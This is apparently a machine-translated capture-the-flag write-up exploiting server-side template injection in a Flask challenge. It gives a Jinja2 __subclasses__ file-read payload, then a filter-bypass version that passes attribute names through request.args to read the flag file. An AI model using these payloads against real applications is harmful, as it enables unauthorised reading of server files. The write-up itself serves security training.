3、 ... and 、Confusion1

 

How to solve the problem ：

1、SSTI Loophole , structure payload

The process ：

 

Elephant         and        The snake （ Really handsome ）

php+python Thought of seeing many times SSTI Loophole

---

Go around first （ There are some information in this ）

login and register All wrong

（ But this must be a very important place ）

 

see robot.txt（ There's nothing ）

---

  Consider analyzing the source code of the page

login.php in Ctrl+U View page source code

Find out flag route

 

---

Analyze whether SSTI Loophole

{ {1+2}}

Calculated , The results of 3

 

---

SSTI Common injection

__class__() Returns the class of the object

__base__()/__mro__() Returns the base class inherited by the class

__subclasses__() Return all subclasses of the inherited class

pyaload：

{ {"".__class__.__mro__[2].__subclasses__()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt").read()}}

The filtered

 

---

structure payload

request yes Flask A global object of the framework , Express " The object of the current request ( flask.request ) "

request.args.key   

args Is the parameter ,key Can be built-in functions

——————

payload：

{ {''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?&a=__class__&b=__mro__&c=__subclasses__&d=read

cyberpeace{a92d9e29b89ab062c895ddc06f237cb6}